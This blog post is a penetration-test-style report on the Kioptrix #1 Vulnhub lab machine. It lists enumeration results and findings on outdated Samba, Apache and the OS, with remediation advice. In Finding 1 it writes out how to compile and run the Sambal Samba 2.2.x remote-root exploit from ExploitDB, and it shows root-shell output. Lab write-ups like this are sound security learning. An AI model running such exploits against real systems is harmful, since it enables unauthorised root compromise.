Quick Report — Kioptrix #1

sic arie
sic arie
Jul 21, 2017 · 5 min read

Executive Summary

On July 19th I decided to assess the security posture of the first Kioptrix virtual machine from Vulnhub. The host was found to be running significantly out of date operating system and software, as well as have several mis-configurations that make this virtual machine extremely vulnerable to attack. It is recommended this machine be decomissioned, and a modern operating system with currently in support software suites be applied for the same function this host performs.

Scope

The scope of this penetration test was limited to the Kioptrix virtual machine, and as such this was segmented on a private network from the internet and from the local network to be run locally on the pentester’s laptop. Within this scope, the expectation was that the pentester would assess the machine from a remote perspective and not attempt to perform hardware or boot-related attacks.

Methodology

In approaching this host, I first downloaded the Kioptrix #1 image from Vulnhub.com, unzipped it, and added it to the list of VMs my virtualization software was able to see. I updated the network to be on the same NAT segment as my attacking vm and turned both on. Initial reconnaissance was performed with the Nmap utility to determine the IP of the new host, as well as what ports were open and if a service was able to be identified from its banner. Once a service was identified, it was further enumerated with automated tooling. The Enum4linux, Nikto, and Nmap NSE scripts were utilized to get more information from the host about the configuration of each of the services.

Once access was achieved on the host, several shell commands were used to determine the running processes, open ports, installed software packages and versions, as well as the system configuration.

Findings

Finding 1 — Remote Code Execution in Samba 2.2.1a (Critical)

The Samba 2.2.1a on the host is vulnerable to the Sambal exploit against Samba hosts 2.2.x versions up to 2.2.8. Using the smbclient command shows the version of Samba in the Server= field as demonstrated below.

root@kali:~/vulnhub# smbclient -L 192.168.233.136
WARNING: The “syslog” option is deprecated
Enter root’s password:
Server does not support EXTENDED_SECURITY but ‘client use spnego = yes and ‘client ntlmv2 auth = yes’
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

The Sambal exploit is targeted at Samba versions from 2.2.0 through 2.2.8, and exploits a buffer overflow in the call_trans2open.c in these Samba versions which allows the execution of arbitrary code. This exploit is located on Kali systems with the ExploitDB included at /usr/share/exploitdb/platforms/linux/remote/10.c. On a 32-bit Kali host, this can be compiled with the following command

gcc -o sambal 10.c

And run against the Kioptrix host, specifying a ‘target’ of 0 passed with the b flag to brute-force Linux hosts. This command will attach to the host automatically and print out the results of the id command to show the user is ‘root’.

root@kali:~/vulnhub# ./sambal -b 0 192.168.233.136
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7–10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

It is recommended that a new host be provisioned for analytics utilizing a project currently under active support, and that the new host not have superfluous services exposed, such as Samba.

Finding 2 — Unsupported OS (High)

Older operating systems that are no longer receiving updates run the risk of a significant vulnerability being discovered and not patched. This risk increases with the age of the operating system.

The Kioptrix 1 virtual machine is running a significantly old version of RedHat, however the specific version was unable to be determined due to modifications to the /etc/issue and uname data. Due to the significant age of this operating system, this rating has been increased.

If this host is still needed, it is recommended that Red Hat Enterprise Linux 7.3 be used with a subscription that provides access to RedHat’s system and package updates. If this is cost-prohibitive, the CentOS 7.7 image should be used.

Finding 3 — Unsupported Software (Critical)

Similar to older operating systems, once a software company or team deprecates a software version it is rare that product and security updates continue for the deprecated versions. As attack and analysis methods progress, they can be applied to older software and new vulnerabilities can be determined.

While the core software supporting the operating system aged with the OS, there were several third-party packages that were significantly out of date. If this host is still needed, it is recommended that these software packages be updated to their supported equivalents.

Webalizer v2.01 — it is not an active project, the final release was 2.23–08 in 2014.
Multi Router Traffic Generator v2.9.6 — also is not an active project as the final release of 2.17.4 came out in January of 2012.

An open source project that may be able to perform the actions of both of the above projects and is under active development is Nagios.

Apache v1.3.20 — The current version is 2.4.27.
Samba v2.2.1a — The current version is 4.6.6.

Finding 6 — Additional or Unnecessary Software on Host (Critical)

When performing the enumeration on this host, the Nmap utility returned the following for service and version enumeration:

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open status 1 (RPC #100024)

The above output shows four separate services exposed on the host — SSH on port 22, Apache on ports 80 & 443, RPC on ports 111 & 1024, and Samba on port 139. As the purpose of this device is to aggregate site traffic information for the purpose of analytics (this is an assumption made by the pentester given the use of the primary applications on the host), the exposure of the RPC and Samba ports are unnecessary, and significantly decrease the security posture of the host given the purpose and vulnerabilities in the exposed software.

I recommend disabling RPC and Samba on the analytics host, as well as ensuring that all accounts with SSH access conform to the principal of least privilege and have a complex password.

)
Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade